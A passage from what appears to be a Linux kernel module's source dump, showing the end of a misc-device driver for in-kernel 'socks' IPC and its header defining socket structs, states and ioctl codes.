506 |     }
507 | 
508 |     pr_info("I'm in\n");
509 |     return 0;
510 | }
511 | /* Module exit point: unregisters the misc device registered by misc_init(). */
512 | static void __exit misc_exit(void)
513 | {
514 |     misc_deregister(&socks_device);
515 | }
516 | 
517 | module_init(misc_init)
518 | module_exit(misc_exit)
519 | 
520 | MODULE_DESCRIPTION("Module providing IPC through socks!");
521 | MODULE_AUTHOR("r2");
522 | MODULE_LICENSE("GPL");


--------------------------------------------------------------------------------
/source/socks.h:
--------------------------------------------------------------------------------
 1 | #ifndef __SOCKS_H__
 2 | 
 3 | #define __SOCKS_H__
 4 | 
 5 | #include <linux/spinlock.h>
 6 | #include <linux/types.h>
 7 | 
 8 | typedef struct sock sock_t;
 9 | 
10 | /* Describes the socket buffer after initialization; socks_ioctl_init allocates it with the data bytes directly behind it */
11 | typedef struct sock_buf {
12 | 	size_t size; 			/* Size of the buffer */
13 | 	unsigned char *buffer; 	/* Pointer to data */
14 | 	size_t read_index;		/* Offset of unread data inside buffer */
15 | 	size_t write_index;		/* Offset where new data will be written */
16 | } sock_buf_t;
17 | 
18 | /* Describes a socket */
19 | typedef struct sock {
20 | 	spinlock_t lock; 				 /* Protect all fields in the structure */
21 | 	struct list_head listening_list; /* Link for the list of listening devices */
22 | 	unsigned char name[64];			 /* The name of this socket when it's listening */
23 | 	int state;						 /* The state of the socket (one of the sock_state values below) */
24 | 	sock_t *peer;					 /* The peer we are connected to, if any */
25 | 	sock_buf_t *buf;				 /* The sock_buf_t representing this socket's data buffer */
26 | } sock_t;
27 | 
28 | typedef enum {
29 | 	UNINITIALIZED = 0,	/* no buffer allocated yet */
30 | 	INITIALIZED = 1,	/* buffer allocated; may listen or connect */
31 | 	LISTENING = 2,		/* linked into sock_device.listening under its name */
32 | 	CONNECTED = 3,		/* paired with a peer; send/recv allowed */
33 | } sock_state;
34 | 
35 | /* Describes the sockets device */
36 | typedef struct sock_device {
37 | 	spinlock_t lock; 			/* Protect listening list */
38 | 	struct list_head listening; /* List of listening sockets */
39 | } sock_dev_t;
40 | 
41 | /* Parameter for listen/connect ioctls */
42 | struct sock_name_param {
43 | 	char name[64];
44 | };
45 | 
46 | /* Parameter for send/recv ioctls */
47 | struct sock_buffer_param {
48 | 	uint64_t size;
49 | 	void * __user buffer;
50 | };
51 | 
52 | /* ioctl codes */
53 | #define IOCTL_SOCKS_INIT			_IOWR('s', 1, uint64_t)
54 | #define IOCTL_SOCKS_LISTEN		_IOWR('s', 2, struct sock_name_param)
55 | #define IOCTL_SOCKS_CONNECT		_IOWR('s', 3, struct sock_name_param)
56 | #define IOCTL_SOCKS_SEND			_IOWR('s', 4, struct sock_buffer_param)
57 | #define IOCTL_SOCKS_RECV			_IOWR('s', 5, struct sock_buffer_param)
58 | #define IOCTL_SOCKS_RESIZE		_IOWR('s', 6, uint64_t) /* not handled by socks_ioctl(): rejected with -EINVAL */
59 | 
60 | 
61 | 
62 | #endif
63 | 


--------------------------------------------------------------------------------